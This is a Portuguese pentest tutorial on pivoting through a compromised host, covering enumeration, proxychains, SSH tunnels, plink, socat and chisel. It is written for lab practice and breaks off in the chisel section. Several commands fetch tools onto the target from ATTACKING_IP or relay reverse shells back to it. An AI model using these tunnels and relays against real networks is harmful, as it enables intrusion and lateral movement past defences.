# Pivoting - Overview

Os métodos que usamos para fazer a dinâmica tendem a variar entre os diferentes sistemas operacionais de destino. Frameworks como o Metasploit podem tornar o processo mais fácil, no entanto, por enquanto, examinaremos mais técnicas manuais de dinamização.

Existem dois métodos principais para a realização de *pivoting*:

**Tunelamento** / **Proxying**: Criação de uma conexão do tipo proxy através de uma máquina comprometida a fim de rotear todo o tráfego desejado para a rede de destino. O tráfego também poderia ser encapsulado dentro de outro protocolo (por exemplo, *encapsulamento SSH*), que pode ser útil para escapar de um *Sistema de Detecção de Intrusão* (**IDS**) básico ou *firewall*.

**Port Forwarding**: Criação de uma conexão entre uma porta local e uma única porta em um destino, por meio de um host comprometido.

Um *proxy* é bom se quisermos redirecionar *muitos tipos diferentes de tráfego* para nossa rede de destino - por exemplo, com uma *varredura nmap* ou para acessar várias portas em várias máquinas diferentes.

O encaminhamento de porta tende a ser mais rápido e confiável, mas só nos permite *acessar uma única porta* (ou um pequeno intervalo) em um dispositivo de destino.

Qual estilo de dinamização é mais adequado dependerá inteiramente do layout da rede, portanto, teremos que começar com uma enumeração adicional antes de decidir como proceder. Seria sensato neste ponto começar também a desenhar um layout da rede como você a vê - embora, no caso desta rede de prática, o layout seja dado na caixa no topo da tela.

Como regra geral, se você tiver vários *pontos de entrada* possíveis, tente usar um destino *Linux/Unix* sempre que possível, pois eles tendem a ser mais fáceis de fazer o *pivot*. Um servidor web Linux voltado para o exterior é absolutamente ideal.

As tarefas restantes nesta seção cobrirão os seguintes tópicos:

-   **Enumerar uma rede usando ferramentas nativas e compiladas estaticamente**
-   **Proxychains / FoxyProxy**
-   **SSH port forwarding and tunnelling (primariamente em Unix)**
-   **plink.exe (Windows)**
-   **socat (Windows e Unix)**
-   **chisel (Windows e Unix)**
-   **sshuttle (apenas em Unix)**

Esta está longe de ser uma lista exaustiva das ferramentas disponíveis para pivotear, portanto, pesquisas adicionais são sempre incentivadas.

## Enumeração Pós-Exploração

Como sempre, a **enumeração é a chave do sucesso**. Informação é poder - quanto mais sabemos sobre nosso alvo, mais opções temos à nossa disposição. Dessa forma, nosso primeiro passo ao tentar *Pivotear* em uma rede é ter uma ideia do que está ao nosso redor.

Existem cinco maneiras possíveis de enumerar uma rede por meio de um host comprometido:

-   **Usando material encontrado na máquina. O arquivo hosts ou cache ARP, por exemplo**;
-   **Usando ferramentas pré-instaladas**;
-   **Usando ferramentas compiladas estaticamente**;
-   **Usando técnicas de script**;
-   **Usando ferramentas locais por meio de um proxy**.

Estão descrito por minha ordem de preferência. Usar ferramentas locais (*sqlmap*, *nmap* e etc) por meio de um proxy é *incrivelmente lento*, portanto, deve ser usado apenas como **último recurso**.

Idealmente, queremos tirar proveito das ferramentas **pré-instaladas** no sistema (os sistemas Linux às vezes têm o Nmap instalado por padrão, por exemplo). Este é um exemplo de *Live-of-the-Land (LotL). Esta é uma boa maneira de minimizar o risco.

Caso contrário, é muito fácil transferir um *binário estático* ou *montar uma ferramenta simples de ping-sweep no Bash* (que abordaremos a seguir).

Antes de mais nada, é sensato verificar se há alguma informação útil *armazenada no alvo*. **arp -a** pode ser usado para *Windows* ou *Linux* para verificar o **cache ARP** da máquina, isso mostrará todos os endereços IP de hosts com os quais o destino interagiu recentemente.

Da mesma forma, os mapeamentos estáticos podem ser encontrados em */etc/hosts* no Linux ou *C:\Windows\System32\drivers* no Windows. */etc/resolv.conf* no Linux também pode identificar quaisquer **servidores DNS locais**, que podem estar configurados incorretamente para permitir algo como um *ataque de transferência de zona DNS* (que está fora do escopo deste conteúdo, mas vale a pena examinar).
No Windows, a maneira mais fácil de verificar se há uma interface nos servidores DNS é com *ipconfig/all*. O Linux tem um comando equivalente como alternativa à leitura do arquivo *resolv.conf*: **nmcli dev show**.

É importante notar também que você pode encontrar hosts que têm firewalls *bloqueando pings de ICMP* (caixas do *Windows* freqüentemente fazem isso, por exemplo). É provável que isso seja menos problemático durante o pivotamento, no entanto, já que esses firewalls (por padrão) geralmente se aplicam apenas ao *tráfego externo*, o que significa que qualquer coisa enviada por meio de um host comprometido na rede deve ser segura. No entanto, vale a pena ter em mente.

Se você suspeitar que um host está *ativo*, mas está *bloqueando* as solicitações de ping ICMP, você também pode verificar algumas portas comuns usando uma ferramenta como o *netcat*.
A verificação de portas no bash pode ser feita (de preferência) de forma totalmente nativa:

`for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done`

Para realizar ping na rede atual, utilizando o bash:

`for i in {1..255}; do (ping -c 1 172.16.0.${i}) | grep "bytes from" &); done`

## Proxychains & Foxyproxy

Nesta tarefa, veremos duas ferramentas de "*proxy*": **Proxychains** e **FoxyProxy**. Ambos nos permitem conectar-se por meio de um dos *proxies* que aprenderemos nas próximas tarefas.
Ao criar um *proxy*, abrimos uma porta em nossa própria máquina de ataque que está conectada ao servidor comprometido, dando-nos acesso à rede de destino.

Pensemos nisso como sendo algo como um túnel criado entre uma porta em nosso host de ataque que sai de dentro de nossa rede atual, para a rede de destino.

**Proxychains** e **FoxyProxy** podem ser usados para direcionar nosso tráfego por esta porta e para nossa rede de destino.

### Proxychains

*Proxychains* é uma ferramenta que já mencionamos brevemente em tarefas anteriores. É uma ferramenta muito útil - embora tenha suas desvantagens. Muitas vezes, os proxychains podem diminuir a velocidade de uma conexão: executar uma varredura *nmap* por meio dele é especialmente infernal.
O ideal é tentar usar ferramentas estáticas sempre que possível e rotear o tráfego por meio de proxychains apenas quando necessário.

Dito isso, vamos dar uma olhada na ferramenta em si.

Proxychains é uma ferramenta de *linha de comando* que é ativada adicionando o comando proxychains a outros comandos. Por exemplo, para fazer proxy do netcat por meio de um proxy, você pode usar o comando:

`# proxychains nc 172.16.0.10 23`

Observe que uma porta proxy não foi especificada no comando acima. Isso ocorre porque o proxychains lê suas opções em um arquivo de configuração. O arquivo de configuração principal está localizado em **/etc/proxychains.conf**. É aqui que o proxychains aparecerá por padrão; no entanto, é na verdade o último local onde o proxychains irá procurar. Os locais (em ordem) são:

-   **O diretório atual (ou seja, ./proxychains.conf)**
-   **~ / .proxychains / proxychains.conf**
-   **/etc/proxychains.conf**

Isso torna extremamente fácil configurar proxychains para uma atribuição específica, sem alterar o arquivo mestre. Simplesmente execute: `# cp /etc/proxychains.conf`. E faça as alterações no arquivo de configuração em uma cópia armazenada em seu diretório atual. Se você provavelmente mover muitos diretórios, poderá colocá-lo em um diretório *.proxychains* em seu diretório inicial, obtendo os mesmos resultados. Se acontecer de você perder ou destruir a cópia master original da configuração do proxychains, uma substituição pode ser baixada aqui.

Por falar no arquivo *proxychains.conf*, há apenas uma seção de uso particular para nós neste momento: bem no final do arquivo estão os servidores usados pelo proxy. Você pode definir mais de um servidor aqui para encadear proxies, no entanto, por enquanto, vamos nos ater a um proxy.

Especificamente, estamos interessados na seção "ProxyList":

`[ProxyList]`

`# add proxy here ...`

`# meanwhile`

`# defaults set to "tor"`

`socks4  127.0.0.1 9050`

É aqui que podemos escolher por quais portas encaminhar a conexão. Por padrão, há um proxy definido para a porta localhost 9050 (esta é a porta padrão para um ponto de entrada do **Tor**, caso você opte por executar um em sua máquina de ataque). Dito isso, não é extremamente útil para nós. Isso deve ser alterado para qualquer porta (arbitrária) que estiver sendo usada para os proxies que iremos configurar nas tarefas a seguir.

Há uma outra linha na configuração de Proxychains à qual vale a pena prestar atenção, especificamente relacionada às configurações de DNS de Proxy:

`proxy_dns`

Se estiver executando uma varredura *Nmap* por meio de *proxychains*, esta opção pode fazer a varredura travar. Comente a linha **proxy_dns** usando uma hashtag (**#**) no início da linha antes de executar uma varredura através do proxy!

Outras coisas a serem observadas ao digitalizar por meio de *proxychains*:

-   Você só pode usar varreduras **TCP**, portanto, nenhuma varredura **UDP** ou **SYN**. Os pacotes *ICMP Echo* (solicitações de ping) também **não funcionarão** por meio do proxy, portanto, use a opção **-Pn** para evitar que o Nmap tente fazê-lo.
-   Será extremamente lento. Tente usar apenas o Nmap por meio de um proxy ao usar o NSE (ou seja, use um binário estático para ver onde as portas / hosts abertos estão antes de fazer proxy de uma cópia local do nmap para usar a biblioteca de scripts).

### FoxyProxy

Proxychains é uma opção aceitável ao trabalhar com ferramentas *CLI*, mas se estiver trabalhando em um *navegador web* para acessar um *webapp* por meio de um proxy, existe uma opção melhor disponível: **FoxyProxy**!

As pessoas costumam usar essa ferramenta para gerenciar seu proxy no **BurpSuite**/**ZAP** de forma rápida e fácil, mas também pode ser usada junto com as ferramentas que veremos em tarefas subsequentes para acessar aplicativos da web em uma rede interna. FoxyProxy é uma extensão de navegador que está disponível para *Firefox* e *Chrome*. Existem duas versões do FoxyProxy disponíveis: *Básica* e *Padrão*.
O **Basic** funciona perfeitamente para nossos propósitos, mas sinta-se à vontade para experimentar o padrão (**Standard**), se desejar.

Nele você pode preencher o IP e a porta no lado direito da página exibida e dar um nome a ele. Também podemos definir o tipo de proxy que você usará. **SOCKS4** geralmente é uma boa aposta, embora o **Chisel** (que abordaremos em uma tarefa posterior) exija **SOCKS5**.

Uma vez ativado, todo o tráfego do seu navegador será redirecionado através da porta escolhida (portanto, certifique-se de que o proxy esteja ativo!). Esteja ciente de que se a rede de destino não tiver acesso à Internet, você não poderá acessar a Internet externa quando o proxy estiver ativado.
Mesmo em um Pentesting real, rotear suas pesquisas gerais na Internet através da rede de um cliente não é aconselhável de qualquer maneira, portanto, é aconselhável desligar o proxy (ou usar os recursos de roteamento no padrão FoxyProxy) para tudo que não seja a interação com a rede de destino.

Com o proxy ativado, você pode simplesmente navegar até o domínio de destino ou IP em seu navegador e o proxy cuidará do resto!

## SSH Tunnelling & Port Forwarding

A primeira ferramenta que veremos é o cliente SSH padrão com um servidor OpenSSH. Usando essas ferramentas simples, é possível criar conexões diretas e reversas para fazer "túneis" SSH, permitindo-nos encaminhar portas e / ou criar proxies.

### Conexões Encaminhadas

A criação de um túnel SSH direto (ou "local") pode ser feito em nosso host de ataque quando tivermos acesso SSH ao alvo. Como tal, esta técnica é muito mais comumente usada contra hosts Unix. Os servidores Linux, em particular, geralmente têm SSH ativo e aberto. Dito isso, a Microsoft (relativamente) recentemente lançou sua própria implementação do servidor OpenSSH, nativo do Windows, então essa técnica pode começar a se tornar mais popular a esse respeito se o recurso ganhar mais força.

Existem duas maneiras de criar um túnel SSH de encaminhamento usando o cliente SSH.

Encaminhamento de porta e criando um proxy:

-   O encaminhamento de portas é realizado com o switch *-L*, que cria um link para uma porta local. Por exemplo, se tivéssemos acesso SSH a *172.16.0.5* e houvesse um servidor web em execução em *172.16.0.10*, poderíamos usar este comando para criar um link para o servidor em *172.16.0.10*:

`ssh -L 8000:172.16.0.10:80 usuário@172.16.0.5 -fN`
    
Poderíamos então acessar o site em *172.16.0.10* (por meio de *172.16.0.5*) navegando para a *porta 8000* em nossa própria máquina de ataque. Por exemplo, digitando *localhost:8000* em um navegador web. Usando essa técnica, criamos efetivamente um túnel entre a porta 80 no servidor de destino e a porta 8000 em nosso próprio computador. Observe que é uma boa prática usar uma porta alta, para a conexão local. Isso significa que as portas baixas ainda estão abertas para seu uso correto (por exemplo, se quisermos iniciar nosso próprio servidor web para servir um exploit a um alvo), e também significa que não precisamos usar *sudo* para criar a conexão. A opção combinada **-fN** faz duas coisas: `-f cria o plano de fundo do shell imediatamente para que tenhamos nosso próprio terminal de volta. -N diz ao SSH que não precisa executar nenhum comando - apenas configurar a conexão.`

-   Os proxies feitos usando o switch *-D*, por exemplo: **-D 1337**. Isso abrirá a porta 1337 em seu host de ataque como um proxy para enviar dados para a rede protegida. Isso é útil quando combinado com uma ferramenta como proxychains. Um exemplo desse comando seria:

`ssh -D 1337 user@172.16.0.5 -fN`

Novamente utilizamos as opções *-fN* para colocar em segundo plano o shell. A escolha da porta *1337* é completamente arbitrária - tudo o que importa é que a porta esteja disponível e configurada corretamente em seu arquivo de configuração de *proxychains* (ou equivalente). Ter esse proxy configurado nos permitiria rotear todo o nosso tráfego para a rede de destino.

### Conexões Reversas

As conexões reversas são muito possíveis com o cliente SSH (e de fato podem ser preferíveis se você tiver um shell no servidor comprometido, mas não o acesso SSH). Eles são, no entanto, mais arriscados, pois você inerentemente deve acessar sua máquina de ataque do alvo, seja usando credenciais ou, de preferência, um sistema baseado em chave. Antes de podermos fazer uma conexão reversa com segurança, existem algumas etapas que precisamos seguir:

-   Primeiro, gere um novo conjunto de chaves SSH e armazene-as em algum lugar seguro:

`$ ssh-keygen`

Isso criará dois novos arquivos: *uma chave privada* e uma *chave pública*.

-   Copie o conteúdo da chave pública (o arquivo que termina com *.pub*) e edite o arquivo **~/.ssh/authorized_keys** em sua próprio host de ataque. Você pode precisar criar o diretório **~/.ssh** e o arquivo **authorized_keys** primeiro.

-   Em uma nova linha, digite o seguinte e cole a chave pública:

`command = "echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty`

Isso garante que a chave só possa ser usada para encaminhamento de porta, impedindo a capacidade de obter um shell no host de ataque.

Próximo passo, verifique se o servidor SSH em seu host de ataque está em execução:

`sudo systemctl status ssh`

A única coisa que resta é fazer o impensável: transferir a chave privada para o host de destino. Isso geralmente é um não-não absoluto, e é por isso que geramos um conjunto descartável de chaves SSH para serem descartadas assim que os procedimentos terminarem.

Com a chave transferida, podemos conectar de volta com uma porta reversa para encaminhamneto, usando o seguinte comando como exemplo:

`ssh -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -fN`

Isso abriria uma porta de encaminhamento para nosso host Kali, permitindo-nos acessar o servidor da web 172.16.0.10, exatamente da mesma maneira que com a conexão direta que fizemos antes!

Em versões mais recentes do cliente SSH, também é possível criar um proxy reverso (o equivalente à flag *-D* usada em conexões locais). Isso pode não funcionar em clientes mais antigos, mas este comando pode ser usado para criar um proxy reverso em clientes que o suportam:

`ssh -R 1337 NOME_DE_USUÁRIO @ ATTACKING_IP -i KEYFILE -fN`

Isso, novamente, abrirá um proxy que nos permite redirecionar todo o nosso tráfego através da porta 1337 do host local, para a rede de destino.

Nota: `O Windows moderno vem com um cliente SSH embutido disponível por padrão. Isso nos permite usar essa técnica em sistemas Windows, mesmo se não houver um servidor SSH em execução no sistema Windows a partir do qual estamos nos conectando. De muitas maneiras, isso torna a próxima tarefa que cobre o plink.exe redundante; no entanto, ainda é muito relevante para sistemas mais antigos.`

-   Para fechar qualquer uma dessas conexões, digite `ps aux | grep ssh` no terminal da host que criou a conexão.

-   Encontre o ID do processo (*PID*) da conexão.

-   Por fim, digite `sudo kill PID` para fechar a conexão.


## Plink.exe

*Plink.exe* é uma versão de linha de comando do Windows do cliente *PuTTY SSH*. Agora que o Windows vem com seu próprio cliente SSH embutido, o *plink* é menos útil para servidores modernos; no entanto, ainda é uma ferramenta muito útil, por isso vamos abordá-la aqui.

De modo geral, é improvável que os servidores Windows tenham um servidor SSH em execução, portanto, nosso uso do *Plink* tende a ser o caso de transportar o binário para o destino e, em seguida, usá-lo para criar uma conexão reversa. Isso seria feito com o seguinte comando:

`cmd.exe /c echo y | . \plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT User@ATTACKING_IP -i KEYFILE -N`

Observe que essa sintaxe é quase idêntica à anterior, ao usar o cliente OpenSSH padrão. O `cmd.exe /c echo y` no início é para shells não interativos (como a maioria dos shells reversos, com shells do Windows sendo difíceis de estabilizar), a fim de contornar a mensagem de aviso de que o destino não se conectou a este host.

Para usar nosso exemplo anterior, se tivermos acesso a *172.16.0.5* e quisermos encaminhar uma conexão a *172.16.0.10:80* de volta para a porta *8000* de nossa própria máquina atacante (*172.16.0.20*), poderíamos usar este comando:

`cmd.exe /c echo y | . \plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N`

Observe que quaisquer chaves geradas por *ssh-keygen* não funcionarão corretamente aqui. Você precisará convertê-los usando a ferramenta *puttygen*, que pode ser instalada no Kali usando *sudo apt install putty-tools*. Depois de baixar a ferramenta, a conversão pode ser feita com:

`puttygen KEYFILE -o OUTPUT_KEY.ppk`

Substituindo em um arquivo válido para o arquivo de chaves e adicionando no arquivo de saída.

O arquivo *.ppk* resultante pode então ser transferido para o destino do Windows e usado exatamente da mesma maneira que com o encaminhamento de porta reversa ensinado na tarefa anterior (apesar da chave privada ser convertida, ela ainda funcionará perfeitamente com a mesma chave pública que nós adicionado ao arquivo *authorized_keys* antes).

Nota: `O Plink é conhecido por ficar desatualizado rapidamente, o que geralmente resulta em falha ao se conectar novamente. Certifique-se sempre de ter uma versão atualizada do .exe. Embora haja uma cópia pré-instalada no Kali em /usr/share/windows-resources/binaries/plink.exe, baixe uma nova cópia daqui antes que um novo pentesting seja sensato.`

## Socat

O Socat não é ótimo apenas para shells Linux totalmente estáveis, também é excelente para encaminhamento de portas (*Port Forwarding*). A única grande desvantagem do socat (além dos problemas frequentes que as pessoas têm ao aprender a sintaxe) é que ele raramente é instalado por padrão em um destino.
Dito isso, binários estáticos são fáceis de encontrar para Linux e Windows. Lembre-se de que é improvável que a versão atual do Windows o antivírus ignore o socat por padrão, portanto, pode ser necessária uma compilação personalizada.
Antes de começar, é importante dar uma dica: Conclua a sala *What the Shell?* do *TryHackMe*, pois depois que você finalizar a sala, você saberá que o socat pode ser usado para criar conexões criptografadas. As técnicas mostradas aqui podem ser combinadas com as opções de criptografia detalhadas na sala de shells para criar encaminhamentos e retransmissões de portas criptografadas. Para evitar complicar demais esta seção, esta técnica não será ensinada aqui; no entanto, vale a pena experimentar isso em seu próprio tempo.

Embora as técnicas a seguir *não* possam ser usadas para configurar um proxy completo em uma rede de destino, é bem possível usá-las para encaminhar portas de hosts de *destinos comprometidos* com *Linux* e *Windows*.
Em particular, o socat é uma retransmissão muito boa, por exemplo, se você está tentando obter um *shell* em um alvo que não tem uma conexão direta com o computador de ataque, pode usar o socat para configurar uma retransmissão no atual host comprometido. Isso escuta o shell reverso do alvo e o encaminha imediatamente de volta para a caixa de ataque.

É melhor pensar em socat como uma forma de juntar duas coisas, como uma espécie de *Portal Gun* nos jogos de Portais, que cria um *link entre dois locais diferentes*.
Pode ser duas portas na mesma máquina, pode ser um *relay* entre duas máquinas diferentes, pode ser para criar uma conexão entre uma porta e um arquivo na máquina de escuta, ou muitas outras coisas semelhantes. É uma ferramenta extremamente poderosa, que vale a pena examinar em seu próprio tempo.

De modo geral, entretanto, os hackers tendem a usá-lo para criar *reverse-shells*/*bind shells* ou, criar um *encaminhamento de porta*. Especificamente, estamos criando um encaminhamento de porta de uma porta no servidor comprometido, para uma porta de escuta em nosso próprio host. Poderíamos fazer isso de outra maneira, encaminhando uma conexão do host atacante para um alvo dentro da rede, ou criando um link direto entre uma porta de escuta no host atacante com o serviço no servidor interno. Este último aplicativo é especialmente útil porque não requer a abertura de uma porta no servidor comprometido.

Antes de usar o socat, geralmente será necessário fazer o download de um binário para ele e, em seguida, carregá-lo no host.

Por exemplo, com um servidor da web Python:

No Kali (dentro do diretório que contém seu binário Socat):

`# python3 -m http.server 80`

Então no alvo:

`# curl ATTACKING_IP/socat -o /tmp/socat-USERNAME && chmod +x /tmp/socat-USERNAME`

### Reverse Relay

Neste cenário, estamos usando socat para criar um *relay* para enviarmos um *reverse shell* de volta para nosso próprio host de ataque. Primeiro, vamos iniciar um ouvinte netcat padrão em nosso host de ataque (*sudo nc -lvnp 443*). Em seguida, no servidor comprometido, use o seguinte comando para iniciar a retransmissão:

`# ./socat tcp-l:8000 tcp:ATTACKING_IP:443 &`

Nota: a ordem dos dois endereços é importante aqui. Certifique-se de abrir a porta de escuta primeiro e, em seguida, conecte-se novamente ao host de ataque.

A partir daqui, podemos criar um shell reverso para a porta 8000 recém-aberta no servidor comprometido. Usando netcat no servidor remoto para simular o recebimento de um shell reverso do servidor de destino.

Uma breve explicação do comando:

-   **tcp-l:8000** é usado para criar a primeira metade da conexão - um ouvinte IPv4 na porta tcp 8000 no host de destino.

-   **tcp:ATTACKING_IP:443** se conecta de volta ao nosso IP local na porta 443. O ATTACKING_IP obviamente precisa ser preenchido corretamente para que isso funcione.

-   **&** coloca o ouvinte em background, transformando-o em um **job** para que ainda possamos usar o shell para executar outros comandos.

-   O **relay** se conecta de volta a um ouvinte iniciado usando um alias para um ouvinte netcat padrão: `sudo nc -lvnp 443`.

Desta forma, podemos configurar um relay para enviar shells reversos através de um sistema comprometido, de volta para nossa própria máquina de ataque.

Essa técnica também pode ser encadeada com bastante facilidade; entretanto, em muitos casos, pode ser mais fácil apenas carregar uma cópia estática do netcat para receber o shell reverso diretamente no servidor comprometido.


### Port Forwaring -- Easy

A maneira rápida e fácil de configurar um *Port Forward* com socat é simplesmente abrir uma porta de escuta no servidor comprometido e redirecionar tudo o que vier para o servidor de destino.
Por exemplo, se o **servidor comprometido for 172.16.0.5** e o destino for a **porta 3306 do host 172.16.0.10**, poderíamos usar o seguinte comando (no servidor comprometido) para criar um encaminhamento de porta:

`# ./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &`

**Este comando abre uma *porta 33060 no servidor comprometido e redireciona o nosso diretamente para o servidor de destino pretendido, essencialmente nos dando acesso ao (presumivelmente banco de dados MySQL) em execução em nosso destino de 172.16.0.10.**

A opção *fork* é usada para colocar cada conexão em um novo processo, e a opção *reuseaddr* significa que a porta permanece aberta depois que uma conexão é feita a ela. **Combinados, eles nos permitem usar o mesmo encaminhamento de porta para mais de uma conexão.** Mais uma vez, usamos *&* para colocar em segundo plano o shell, o que nos permite continuar usando a mesma sessão de terminal no servidor comprometido para outras coisas.

Agora podemos nos conectar à porta 33060 no *relay* (172.16.0.5) e ter nossa conexão retransmitida diretamente para nosso destino pretendido de *172.16.0.10:3306*.


### Port Forwarding -- Quiet

A técnica anterior é rápida e fácil, mas também abre uma porta no servidor comprometido, que poderia ser detectada por qualquer tipo de IDS ou varredura de rede. Embora o risco não seja enorme, vale a pena conhecer um método um pouco mais silencioso de encaminhamento de porta com socat. Este método é um pouco mais complexo, mas não requer a abertura de uma porta externamente no servidor comprometido.

Em primeiro lugar, em nosso próprio host, digitamos o seguinte comando:

`socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &`

Isso abre duas portas: *8000* e *8001*, criando uma retransmissão de porta local. O que entra em um deles sairá do outro. Por esse motivo, a porta *8000* também tem as opções *fork* e *reuseaddr* configuradas, para nos permitir criar mais de uma conexão usando esse encaminhamento de porta.

Em seguida, no servidor de retransmissão comprometido (*172.16.0.5* no exemplo anterior), executamos este comando:

`./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &`

Isso faz uma conexão entre nossa porta de escuta *8001* no host de ataque e a porta aberta do servidor de destino. Para usar a rede fictícia de antes, poderíamos inserir este comando como:

`./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &`

Isso criaria um *link* entre a porta *8000* em nosso host de ataque e a porta *80* no alvo pretendido (*172.16.0.10*), o que significa que poderíamos digitar para *localhost:8000* no navegador web de nosso host de ataque para carregar a página do website hospedada pelo alvo: *172.16.0.10:80*!

Este é um cenário bastante complexo de visualizar, então vamos examinar rapidamente o que acontece quando você tenta acessar a página web em seu navegador:

-   Realizamos a request pelo navegador, para *127.0.0.1:8000*;
-   Devido ao ouvinte socat que começamos em nossa própria máquina, qualquer coisa que vá para a porta 8000, sai da porta 8001
-   A porta 8001 está conectada diretamente ao processo socat que executamos no servidor comprometido, o que significa que qualquer coisa que sai da porta 8001 é enviada ao servidor comprometido, onde é retransmitida para a porta 80 no servidor de destino.

O processo é então revertido quando o alvo envia a resposta de nossa request:

-   A resposta é enviada ao processo *socat* no servidor comprometido. O que entra no processo sai do outro lado, que se *conecta diretamente à porta 8001 em nosso host de ataque*.
-   *Tudo o que vai para a porta 8001 em nosso host de ataque sai da porta 8000 em nossa máquina de ataque*, que é onde o navegador web espera receber sua resposta, portanto, a página é recebida e devidamente renderizada.

Agora alcançamos a mesma coisa que antes, mas sem abrir nenhuma porta no servidor!

Por fim, aprendemos como criar encaminhamentos e *relays* de porta *socat* em segundo plano, mas também é importante saber como fechá-los. A solução é simples: execute o comando *jobs* em seu terminal e, em seguida, elimine todos os processos socat usando *kill%NUMBER*

## Chisel

O **Chisel** é uma ferramenta incrível que pode ser usada para configurar rápida e facilmente um **tunnelled proxy** ou **port forward** através de um sistema comprometido, independentemente de você ter acesso SSH ou não.
É escrito em *Golang* e pode ser facilmente compilado para qualquer sistema (com binários estáticos para Linux e Windows). Em muitos aspectos, ele fornece a mesma funcionalidade que o proxy SSH/PortForward padrão que abordamos anteriormente; no entanto, o fato de não exigir acesso SSH no destino comprometido é um grande bônus.

Antes que possamos usar o **chinsel**, precisamos baixar binários apropriados da página de realease do GitHub Oficial da ferramenta. Estes podem então ser descompactados usando *Gunzip* e executados normalmente.

Você deve ter uma cópia apropriada do binário no *host de ataque* e no *servidor comprometido*. Copie o arquivo para o servidor remoto com a escolha do método de transferência de arquivos. Você pode usar o método do WebServer coberto nas tarefas anteriores, ou  você pode usar o SCP:

`# scp -i KEY chisel user@target:/tmp/chisel-USERNAME`

O *Binário Chisel* tem dois modos: **cliente** e **servidor**. Você pode acessar os menus de ajuda para com o comando:

`# chisel client|server --help`

Estaremos estudando os dois modos de uso neste tópico (um **SOCKS Proxy** e **Port Forward**)
No entanto, o Chisel é uma ferramenta muito versátil que pode ser usada em muitas maneiras não descritas aqui. Você é encorajado a ler através das páginas de ajuda para a ferramenta por esse motivo.

### Reverse SOCKS Proxy

Vamos começar criando um proxy SOCKS reverso com o *chisel*. Nos conectando de volta de um *servidor comprometido* a um ouvinte esperando em nosso host de ataque.

Em nossa próprio host de ataque, usaríamos um comando que parece algo assim:

`# ./chisel server -p LISTEN_PORT --reverse &`

O **LISTEN_PORT** cria um ouvinte. No host comprometido, nós iremos executar o comando abaixo:

`# ./chisel client ATTACKING_IP:LISTEN_PORT R:socks &`

Este comando conecta de volta ao ouvinte em nosso host de ataque, completando o proxy. Como antes, estamos usando o símbolo de *&* para colocarmos essa atividade em background.

Observe que, apesar de conectar-se à **porta 1337** com sucesso, o proxy real foi aberto em **127.0.0.1:1080**. Como tal, estaremos usando a porta 1080 ao enviar dados através do proxy.

Observe o uso de **R:socks** neste comando. "*R*" é um prefixo para *remotes* (argumentos que determinam o que está sendo encaminhado ou proxiado, neste caso, configurando um proxy) ao conectar-se a um servidor de **chisel** que foi iniciado no modo reverso.
Ele essencialmente informa ao cliente de chisel que o servidor criará o proxy ou a port forward no lado do cliente (por exemplo, iniciando um proxy no destino comprometido em execução ao cliente, em vez de ser criado no host de ataque em execução no servidor). Mais uma vez, ler as páginas de ajuda do cinzel para mais informações é recomendada.

### Forward SOCKS Proxy

Proxy forwards são mais raros do que os reverse proxies, pelo mesmo motivo que as *reverse shells* são mais comuns do que as *bind shells*.
De um modo geral, os firewalls que realizam manuseio de tráfego de saída, são menos rigorosos que os firewalls que lidam com conexões de entrada. Dito isto, ainda vale a pena aprender a configurar um proxy forward com o chisel.

Em muitos aspectos, a sintaxe para isso é simplesmente invertida de um proxy reverso.

Primeiro, no hospedeiro comprometido, usaríamos:

`# ./chisel server -p LISTEN_PORT --socks5`

Depois, em nosso prórpio host de ataque:

`# ./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks`

Nesse comando, *proxy_port* é a porta que será aberta para o proxy.

Por exemplo, `./chisel client 172.16.0.10:8080 1337:socks` se conectariam a um servidor de chisel em execução na porta *8080* de *172.16.0.10*. Um proxy socks seria aberto na porta *1337* da nosso host de ataque.

#### ProxyChains Reminder

Ao enviar dados por qualquer um desses proxies, precisaríamos definir a porta em nossa configuração de *proxychains*. Como o chisel usa um proxy *Socks5*, também precisaremos alterar o início da linha de *Socks4* para *Socks5*:

`[ProxyList]`

`# add proxy here ...`

`# meanwhile`

`# defaults set to "tor"`

`socks5  127.0.0.1 1080`

**Nota**: A configuração acima é para um *reverse socks proxy*, como mencionado anteriormente, o proxy é aberto na porta *1080* em vez da porta de escuta especificada (*1337*). Se você usar *proxychains* com um proxy forward, a porta deve ser definida para qualquer porta que você abriu (1337 no exemplo acima).

Agora que vimos como usar o chisel para criar um SOCKS proxy, vamos dar uma olhada para usá-lo para criar uma port forward com o chisel.

### Remote Port Forward

Um Remote Port Forward é quando nos conectamos de um destino comprometido para criar um encaminhamento de tráfego.

Para um Remote Port Foward, em nosso host de ataque, usamos o mesmo comando exatamente como antes:

`# ./chisel server -p LISTEN_PORT --reverse &`

Mais uma vez, isso estabelece um ouvinte do chisel para o host comprometido se conectar.
O comando para o host comprometido se conectar é ligeiramente diferente desta vez:

`# ./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &`

Você pode reconhecer isso como sendo muito semelhante ao método avançado da *SSH Reverse Port Forward*, onde especificamos a porta local para abrir, o IP de destino e a porta de destino, separadas por *:*.
Observe a distinção entre o *listen_port* e o *local_port*. Aqui, o **listen_port* é a porta que iniciamos o servidor de chisell, e o *local_port* é a porta que desejamos abrir em nosso próprio host de ataque para conectarmos com a porta de destino desejada.

Para usar um exemplo antigo, vamos supor que nosso próprio IP seja *172.16.0.20*, o IP do servidor comprometido é *172.16.0.5*, e nosso alvo é a* porta 22* em* 172.16.0.10*. A sintaxe para encaminhamento *172.16.0.10:22* Voltar à porta *2222*. Em nosso host de ataque seria a seguinte:

`# ./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22 &`

Conectando de volta ao nosso de ataque, funcionando como um servidor de chisel iniciado com:

`# ./chisel server -p 1337 --reverse &`

Isso nos permitiria acessar *172.16.0.10:22* (via *ssh*) através do *127.0.0.1:2222*.

### Local Port Forward

Tal como acontece com o SSH, uma Local Port Forward é onde nos conectamos da nossa própria máquina de ataque a um servidor de chisel, ouvindo um alvo comprometido.

